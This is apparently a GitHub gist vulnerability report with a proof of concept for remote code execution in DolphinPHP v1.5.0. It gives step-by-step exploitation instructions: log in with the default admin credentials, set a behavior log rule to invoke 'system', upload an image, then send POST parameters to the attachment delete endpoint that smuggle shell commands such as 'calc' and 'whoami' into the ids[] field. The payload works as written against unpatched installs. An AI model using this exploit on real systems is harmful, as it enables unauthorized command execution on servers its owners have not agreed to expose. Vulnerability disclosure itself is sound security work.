Skip to content

Instantly share code, notes, and snippets.

@w4nd3r-hya

w4nd3r-hya/report.md Secret

Last active December 30, 2021 02:01
Show Gist options
  • Save w4nd3r-hya/784a86dda91bdcb3071892e56aacdee2 to your computer and use it in GitHub Desktop.
Save w4nd3r-hya/784a86dda91bdcb3071892e56aacdee2 to your computer and use it in GitHub Desktop.
Download ZIP
Dolphinphp v1.5.0 contains a remote code execution vulnerability in common.php
Raw
report.md

Visit /public/admin.php to jump to the login page, the default password is admin admin

1 jpg 2. Click System -> Behavior Management, find the option "attachments_delete" on the second page, click Edit image

Change the belonging module to system image

Drag to the bottom and change the log rule to [details|system] test [details] and submit image

Click on the system to upload any picture image

After uploading, click Attachment Management on the left, get id=1 image

Here is the poc image

http://localhost/DolphinPHPV1.5.0/public/admin.php/admin/attachment/delete

ids[]=calc%26&ids[]=1

Successfully execute the command to pop up the calculator image

If you want to execute the command again, you need to repeat the above step 4 (upload the picture to get the id), and the id is 2 at this time image

Modify the post parameters to image

ids[]=whoami%26&ids[]=2

image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment